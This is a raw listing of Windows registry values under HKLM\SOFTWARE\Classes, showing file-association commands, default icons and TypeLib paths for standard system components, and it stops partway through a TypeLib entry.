%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,PrepareDiscForBurnRunDll %L HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SPCFile\shell\add\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtAddSPC %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SPCFile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenPKCS7 %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Stack FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\searchfolder.dll,-9028 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Stack\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-148 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Stack.System.Music.AlbumID\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-1026 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Stack.System.Music.AlbumTitle\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-1026 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Stack.System.SearchScope\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-4 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Stack.System.WordWheel\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-177 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\svgfile\shell\print\command (Default) REG_EXPAND_SZ "%systemroot%\system32\rundll32.exe" "%systemroot%\system32\mshtml.dll",PrintHTML "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\svgfile\shell\printto\command (Default) REG_EXPAND_SZ "%systemroot%\system32\rundll32.exe" "%systemroot%\system32\mshtml.dll",PrintHTML "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SyncRibbonCommands\shell\OfflineFilesSync MuiVerb REG_SZ @%SystemRoot%\system32\cscui.dll,-7050 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.3ds\Shell\3D Print (Default) REG_SZ @%SystemRoot%\\system32\\PrintDialogs3D.dll,-5039 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.3mf\Shell\3D Edit (Default) REG_SZ @%SystemRoot%\system32\mspaint.exe,-59500 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.3mf\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.3mf\Shell\3D Print (Default) REG_SZ @%SystemRoot%\\system32\\PrintDialogs3D.dll,-5039 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.bmp\Shell\3D Edit (Default) REG_SZ @%SystemRoot%\system32\mspaint.exe,-59500 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.bmp\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.bmp\Shell\setdesktopwallpaper (Default) REG_EXPAND_SZ @%SystemRoot%\system32\stobject.dll,-417 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.bmp\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.dae\Shell\3D Print (Default) REG_SZ @%SystemRoot%\\system32\\PrintDialogs3D.dll,-5039 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.dib\Shell\setdesktopwallpaper (Default) REG_EXPAND_SZ @%SystemRoot%\system32\stobject.dll,-417 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.dib\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.dxf\Shell\3D Print (Default) REG_SZ @%SystemRoot%\\system32\\PrintDialogs3D.dll,-5039 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.fbx\Shell\3D Edit (Default) REG_SZ @%SystemRoot%\system32\mspaint.exe,-59500 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.fbx\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.gif\Shell\3D Edit (Default) REG_SZ @%SystemRoot%\system32\mspaint.exe,-59500 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.gif\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.gif\Shell\setdesktopwallpaper (Default) REG_EXPAND_SZ @%SystemRoot%\system32\stobject.dll,-417 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.gif\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.glb\Shell\3D Edit (Default) REG_SZ @%SystemRoot%\system32\mspaint.exe,-59500 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.glb\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.jfif\Shell\3D Edit (Default) REG_SZ @%SystemRoot%\system32\mspaint.exe,-59500 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.jfif\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.jfif\Shell\setdesktopwallpaper (Default) REG_EXPAND_SZ @%SystemRoot%\system32\stobject.dll,-417 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.jfif\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.jpe\Shell\3D Edit (Default) REG_SZ @%SystemRoot%\system32\mspaint.exe,-59500 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.jpe\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.jpe\Shell\setdesktopwallpaper (Default) REG_EXPAND_SZ @%SystemRoot%\system32\stobject.dll,-417 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.jpe\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.jpeg\Shell\3D Edit (Default) REG_SZ @%SystemRoot%\system32\mspaint.exe,-59500 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.jpeg\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.jpeg\Shell\setdesktopwallpaper (Default) REG_EXPAND_SZ @%SystemRoot%\system32\stobject.dll,-417 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.jpeg\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.jpg\Shell\3D Edit (Default) REG_SZ @%SystemRoot%\system32\mspaint.exe,-59500 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.jpg\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.jpg\Shell\setdesktopwallpaper (Default) REG_EXPAND_SZ @%SystemRoot%\system32\stobject.dll,-417 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.jpg\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.obj\Shell\3D Edit (Default) REG_SZ @%SystemRoot%\system32\mspaint.exe,-59500 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.obj\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.obj\Shell\3D Print (Default) REG_SZ @%SystemRoot%\\system32\\PrintDialogs3D.dll,-5039 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.ply\Shell\3D Edit (Default) REG_SZ @%SystemRoot%\system32\mspaint.exe,-59500 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.ply\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.ply\Shell\3D Print (Default) REG_SZ @%SystemRoot%\\system32\\PrintDialogs3D.dll,-5039 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.png\Shell\3D Edit (Default) REG_SZ @%SystemRoot%\system32\mspaint.exe,-59500 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.png\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.png\Shell\setdesktopwallpaper (Default) REG_EXPAND_SZ @%SystemRoot%\system32\stobject.dll,-417 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.png\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.stl\Shell\3D Edit (Default) REG_SZ @%SystemRoot%\system32\mspaint.exe,-59500 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.stl\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.stl\Shell\3D Print (Default) REG_SZ @%SystemRoot%\\system32\\PrintDialogs3D.dll,-5039 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.tif\Shell\3D Edit (Default) REG_SZ @%SystemRoot%\system32\mspaint.exe,-59500 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.tif\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.tif\Shell\setdesktopwallpaper (Default) REG_EXPAND_SZ @%SystemRoot%\system32\stobject.dll,-417 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.tif\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.tiff\Shell\3D Edit (Default) REG_SZ @%SystemRoot%\system32\mspaint.exe,-59500 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.tiff\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.tiff\Shell\setdesktopwallpaper (Default) REG_EXPAND_SZ @%SystemRoot%\system32\stobject.dll,-417 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.tiff\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.wdp\Shell\setdesktopwallpaper (Default) REG_EXPAND_SZ @%SystemRoot%\system32\stobject.dll,-417 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.wdp\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.wrl\Shell\3D Print (Default) REG_SZ @%SystemRoot%\\system32\\PrintDialogs3D.dll,-5039 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll,-16824 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\document\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll,-16822 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\image\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll,-16823 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\image\shell\edit\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\image\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\MAPI/Attachment FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\mssvp.dll,-116 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\MAPI/Folder FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\mssvp.dll,-109 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\MAPI/IPM.Activity FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\mssvp.dll,-120 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\MAPI/IPM.Appointment FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\mssvp.dll,-113 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\MAPI/IPM.Contact FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\mssvp.dll,-115 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\MAPI/IPM.DistList FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\mssvp.dll,-115 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\MAPI/IPM.Message FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\mssvp.dll,-108 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\MAPI/IPM.Note FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\mssvp.dll,-108 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\MAPI/IPM.Note.Read FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\mssvp.dll,-108 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\MAPI/IPM.Post FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\mssvp.dll,-108 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\MAPI/IPM.Post.Rss FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\mssvp.dll,-139 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\MAPI/IPM.Schedule.Meeting FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\mssvp.dll,-113 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\MAPI/IPM.StickyNote FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\mssvp.dll,-117 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\MAPI/IPM.Task FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\mssvp.dll,-114 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\system\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-67 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\text\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-102 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\text\shell\edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\NOTEPAD.EXE %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\text\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\NOTEPAD.EXE %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\video\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll,-16825 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\themefile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\themeui.dll,-701 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\themefile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\themepackfile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\themeui.dll,-704 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\themepackfile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TIFImage.Document FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\shell32.dll,-30599 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TIFImage.Document\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-122 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TIFImage.Document\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TIFImage.Document\shell\printto\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\shimgvw.dll",ImageView_PrintTo /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ttcfile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontext.dll,-419 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ttcfile\shell\preview\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontview.exe %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ttcfile\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontview.exe /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ttffile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontext.dll,-419 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ttffile\shell\preview\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontview.exe %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ttffile\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontview.exe /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\notepad.exe,-469 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-102 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\NOTEPAD.EXE %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\NOTEPAD.EXE /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\printto\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\notepad.exe /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{03837500-098B-11D8-9414-505054503030}\1.0\0\win32 (Default) REG_EXPAND_SZ %systemroot%\system32\pla.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{03837500-098B-11D8-9414-505054503030}\1.0\0\win64 (Default) REG_EXPAND_SZ %systemroot%\system32\pla.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{0A055C02-BABE-4480-BB7B-A8EC723CE9C0}\1.0\0\win32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shgina.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{0A055C02-BABE-4480-BB7B-A8EC723CE9C0}\1.0\HELPDIR (Default) REG_EXPAND_SZ %SystemRoot%\system32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{10E3A8C1-B46C-4B6C-B3EF-8E2F48D527D0}\1.0\0\win32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\sppwmi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{10E3A8C1-B46C-4B6C-B3EF-8E2F48D527D0}\1.0\HELPDIR (Default) REG_EXPAND_SZ %SystemRoot%\System32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{11A8B8EE-BF30-409A-8EF7-3A143EF70332}\1.0\0\win32 (Default) REG_EXPAND_SZ %systemroot%\system32\azroles.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{11A8B8EE-BF30-409A-8EF7-3A143EF70332}\1.0\HELPDIR (Default) REG_EXPAND_SZ %systemroot%\system32\ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{122F1BB4-2723-4ac2-A36A-16BB9E8B99A6}\1.0\0\win32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\netcenter.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{122F1BB4-2723-4ac2-A36A-16BB9E8B99A6}\1.0\0\win64 (Default) REG_EXPAND_SZ %SystemRoot%\system32\netcenter.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{122F1BB4-2723-4ac2-A36A-16BB9E8B99A6}\1.0\HELPDIR (Default) REG_EXPAND_SZ %SystemRoot%\system32\ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{13199C00-7494-11D0-8816-00A0C903B83C}\1.0\0\win32 (Default) REG_EXPAND_SZ %systemroot%\system32\certenc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{157702D8-B1C1-40B8-8B46-AF2B40022085}\1.0\0\win32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wlanpref.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{157702D8-B1C1-40B8-8B46-AF2B40022085}\1.0\0\win64 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wlanpref.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{157702D8-B1C1-40B8-8B46-AF2B40022085}\1.0\HELPDIR (Default) REG_EXPAND_SZ %SystemRoot%\system32\ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{15AE3A36-E53B-454d-A816-A7C61CBAB8A4}\1.0\0\Win32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\WinSATAPI.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{1B8D8AE1-A595-4687-A7AD-9E3828E09B79}\1.0\0\win32 (Default) REG_EXPAND_SZ %systemroot%\system32\wksprt.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{1B8D8AE1-A595-4687-A7AD-9E3828E09B79}\1.0\HELPDIR (Default) REG_SZ %systemroot%\system32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{1fda955a-61ff-11da-978c-0008744faab7}\1.0\0\win32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\dtsh.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{1fda955a-61ff-11da-978c-0008744faab7}\1.0\0\win64 (Default) REG_EXPAND_SZ %SystemRoot%\system32\dtsh.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{1fda955a-61ff-11da-978c-0008744faab7}\1.0\HELPDIR (Default) REG_EXPAND_SZ %SystemRoot%\system32\ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{204810B3-73B2-11D4-BF42-00B0D0118B56}\1.0\0\win32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\upnpcont.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{204810B3-73B2-11D4-BF42-00B0D0118B56}\1.0\HELPDIR (Default) REG_EXPAND_SZ %SystemRoot%\system32\ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{32A11B9F-9C1D-46C2-B66F-6C05211135E1}\1.0\0\win32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\cellularapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{353D638F-C81B-4476-8323-63A7EE274205}\1.0\0\win32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\BdeUISrv.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{353D638F-C81B-4476-8323-63A7EE274205}\1.0\0\win64 (Default) REG_EXPAND_SZ %SystemRoot%\System32\BdeUISrv.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{372FCE32-4324-11D0-8810-00A0C903B83C}\1.0\0\win32 (Default) REG_EXPAND_SZ %systemroot%\system32\certcli.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{372FCE32-4324-11D0-8810-00A0C903B83C}\1.0\HELPDIR (Default) REG_EXPAND_SZ %systemroot%\system32\ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{3D5905E0-523C-11D1-9FEA-00600832DB4A}\1.0\0\win32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\cic.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{3D5905E0-523C-11D1-9FEA-00600832DB4A}\1.0\0\win64 (Default) REG_EXPAND_SZ %SystemRoot%\system32\cic.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{3D5905E0-523C-11D1-9FEA-00600832DB4A}\1.0\HELPDIR (Default) REG_EXPAND_SZ %SystemRoot%\system32\ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{3DE641EF-0556-4D4A-98D5-7DBD8AD5D70F}\1.0\0\win32 (Default) REG_EXPAND_SZ %systemroot%\system32\eventcls.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{3DE641EF-0556-4D4A-98D5-7DBD8AD5D70F}\1.0\HELPDIR (Default) REG_EXPAND_SZ %systemroot%\system32\ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{3ff1aab8-f3d8-11d4-825d-00104b3646c0}\1.0\0\Win32 (Default) REG_SZ %SystemRoot%\system32\WaaSMedicPS.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{3ff1aab8-f3d8-11d4-825d-00104b3646c0}\1.0\0\Win64 (Default) REG_SZ %SystemRoot%\system32\WaaSMedicPS.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{43136EB0-D36C-11CF-ADBC-00AA00A80033}\1.0\0\win32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmcndmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{43136EB0-D36C-11CF-ADBC-00AA00A80033}\1.0\0\win64 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmcndmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{438EDB38-282C-435D-8BE3-4AB90B83CEF5}\1.0\0\win32 (Default) REG_EXPAND_SZ %systemroot%\system32\printui.dll\1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{43E734CA-043D-4A70-9A2C-A8F254063D91}\1.0\0\win32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\hnetcfg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{44EC0535-400F-11D0-9DCD-00A0C90391D3}\1.0\HELPDIR (Default) REG_SZ 